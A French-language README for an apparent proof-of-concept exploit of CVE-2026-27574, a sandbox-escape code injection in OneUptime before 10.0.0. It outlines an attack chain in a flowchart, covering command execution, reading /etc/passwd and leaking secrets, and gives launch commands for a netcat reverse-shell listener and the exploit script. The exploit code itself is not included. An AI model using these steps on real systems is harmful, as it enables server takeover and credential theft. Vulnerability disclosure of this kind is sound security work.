
Preuve de concept d'exploitation pour CVE-2026-27574, une injection de code critique dans OneUptime permettant l'exécution de code à distance et la fuite de variables d'environnement.
Preuve de concept (PoC) pour CVE-2026-27574 – une vulnérabilité critique d'injection de code (CWE-94) dans OneUptime < 10.0.0 permettant l'exécution arbitraire de JavaScript dans le contexte du probe, conduisant à une complète et à la fuite de variables d'environnement sensibles.
Corrigé dans : OneUptime 10.0.0 (migration vers isolated-vm)
Type d'exploit : À distance
Authentification : Faible privilège (tout membre de projet enregistré)
Impact : Compromission totale du serveur, vol d'identifiants, prise de contrôle du cluster
flowchart TD
A[Start] --> B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]
# Démarrer le listener (si reverse shell utilisé)
nc -lvnp 4444
# Exécuter l'exploit
python3 exploit.py http://cible:3002 --lhost VOTRE_IP --lport 4444
requests (pip install requests)Ce code est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.
Développé par Mohammed Idrees Banyamer • Jordanie • @banyamer_security